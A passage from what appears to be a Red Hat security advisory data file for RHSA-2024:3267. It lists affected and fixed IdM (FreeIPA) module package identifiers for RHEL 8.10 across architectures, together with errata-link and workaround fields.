"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-selinux-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-dns-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipalib-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipaserver-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipatests-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-qrcode-core-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-healthcheck-0:0.12-3.module+el8.9.0+19692+fac39a03.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19692+fac39a03.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-selinux-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-ipalib-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-qrcode-core-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.src"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:3267"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-0:4.9.13-9.module+el8.10.0+21691+df63127d.src",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.src",
